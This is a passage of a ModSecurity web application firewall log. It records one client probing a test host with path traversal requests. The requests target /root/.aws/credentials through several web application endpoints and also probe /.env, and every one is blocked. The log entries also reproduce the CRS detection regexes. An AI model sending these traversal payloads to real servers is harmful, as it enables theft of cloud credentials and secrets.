"platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aETYpBa8k0A1fnYogFi4OgAAAAQ"]
[Sun Jun 08 02:26:12.199912 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /index.php?option=com_media&view=mediaList&tmpl=component&fieldid=filename&folder=../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aETYpBa8k0A1fnYogFi4OgAAAAQ"]
[Sun Jun 08 02:26:12.199955 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /index.php?option=com_media&view=medialist&tmpl=component&fieldid=filename&folder=../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aETYpBa8k0A1fnYogFi4OgAAAAQ"]
[Sun Jun 08 02:26:12.201269 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aETYpBa8k0A1fnYogFi4OgAAAAQ"]
[Sun Jun 08 02:26:12.201483 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aETYpBa8k0A1fnYogFi4OgAAAAQ"]
[Sun Jun 08 02:26:12.802665 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /index.php?file=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aETYpBa8k0A1fnYogFi4OwAAAAQ"]
[Sun Jun 08 02:26:12.802733 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /index.php?file=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aETYpBa8k0A1fnYogFi4OwAAAAQ"]
[Sun Jun 08 02:26:12.802769 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /index.php?file=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aETYpBa8k0A1fnYogFi4OwAAAAQ"]
[Sun Jun 08 02:26:12.803306 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aETYpBa8k0A1fnYogFi4OwAAAAQ"]
[Sun Jun 08 02:26:12.803510 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aETYpBa8k0A1fnYogFi4OwAAAAQ"]
[Sun Jun 08 02:26:14.477703 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /ajax_dashboard.php?widget=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/ajax_dashboard.php"] [unique_id "aETYpha8k0A1fnYogFi4PQAAAAQ"]
[Sun Jun 08 02:26:14.477772 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /ajax_dashboard.php?widget=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/ajax_dashboard.php"] [unique_id "aETYpha8k0A1fnYogFi4PQAAAAQ"]
[Sun Jun 08 02:26:14.477807 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /ajax_dashboard.php?widget=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/ajax_dashboard.php"] [unique_id "aETYpha8k0A1fnYogFi4PQAAAAQ"]
[Sun Jun 08 02:26:14.478331 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/ajax_dashboard.php"] [unique_id "aETYpha8k0A1fnYogFi4PQAAAAQ"]
[Sun Jun 08 02:26:14.478561 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/ajax_dashboard.php"] [unique_id "aETYpha8k0A1fnYogFi4PQAAAAQ"]
[Sun Jun 08 02:26:15.720943 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /remote/fgt_lang?lang=/../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/remote/fgt_lang"] [unique_id "aETYpxa8k0A1fnYogFi4PgAAAAQ"]
[Sun Jun 08 02:26:15.721017 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /remote/fgt_lang?lang=/../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/remote/fgt_lang"] [unique_id "aETYpxa8k0A1fnYogFi4PgAAAAQ"]
[Sun Jun 08 02:26:15.721055 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /remote/fgt_lang?lang=/../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/remote/fgt_lang"] [unique_id "aETYpxa8k0A1fnYogFi4PgAAAAQ"]
[Sun Jun 08 02:26:15.721463 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/remote/fgt_lang"] [unique_id "aETYpxa8k0A1fnYogFi4PgAAAAQ"]
[Sun Jun 08 02:26:15.721651 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/remote/fgt_lang"] [unique_id "aETYpxa8k0A1fnYogFi4PgAAAAQ"]
[Sun Jun 08 02:26:16.890850 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aETYqBa8k0A1fnYogFi4PwAAAAQ"]
[Sun Jun 08 02:26:16.892612 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aETYqBa8k0A1fnYogFi4PwAAAAQ"]
[Sun Jun 08 02:26:16.892844 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aETYqBa8k0A1fnYogFi4PwAAAAQ"]
[Sun Jun 08 02:26:18.346556 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /mgmt/shared/authn/login/root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/mgmt/shared/authn/login/~../~../~../~../root/.aws/credentials"] [unique_id "aETYqha8k0A1fnYogFi4QAAAAAQ"]
[Sun Jun 08 02:26:18.346799 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/mgmt/shared/authn/login/~../~../~../~../root/.aws/credentials"] [unique_id "aETYqha8k0A1fnYogFi4QAAAAAQ"]
[Sun Jun 08 02:26:18.346995 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/mgmt/shared/authn/login/~../~../~../~../root/.aws/credentials"] [unique_id "aETYqha8k0A1fnYogFi4QAAAAAQ"]
[Sun Jun 08 02:26:19.936964 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aETYqxa8k0A1fnYogFi4QQAAAAQ"]
[Sun Jun 08 02:26:19.937182 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aETYqxa8k0A1fnYogFi4QQAAAAQ"]
[Sun Jun 08 02:26:19.937373 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aETYqxa8k0A1fnYogFi4QQAAAAQ"]
[Sun Jun 08 02:26:21.137589 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /index.php/core/preview?file=../../../../../../../../root/.aws/credentials&x=100&y=100"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/index.php/core/preview"] [unique_id "aETYrRa8k0A1fnYogFi4QgAAAAQ"]
[Sun Jun 08 02:26:21.137665 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /index.php/core/preview?file=../../../../../../../../root/.aws/credentials&x=100&y=100"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/index.php/core/preview"] [unique_id "aETYrRa8k0A1fnYogFi4QgAAAAQ"]
[Sun Jun 08 02:26:21.137702 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /index.php/core/preview?file=../../../../../../../../root/.aws/credentials&x=100&y=100"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/index.php/core/preview"] [unique_id "aETYrRa8k0A1fnYogFi4QgAAAAQ"]
[Sun Jun 08 02:26:21.138298 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/index.php/core/preview"] [unique_id "aETYrRa8k0A1fnYogFi4QgAAAAQ"]
[Sun Jun 08 02:26:21.138516 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/index.php/core/preview"] [unique_id "aETYrRa8k0A1fnYogFi4QgAAAAQ"]
[Sun Jun 08 02:26:22.144420 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aETYrha8k0A1fnYogFi4QwAAAAQ"]
[Sun Jun 08 02:26:22.144633 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aETYrha8k0A1fnYogFi4QwAAAAQ"]
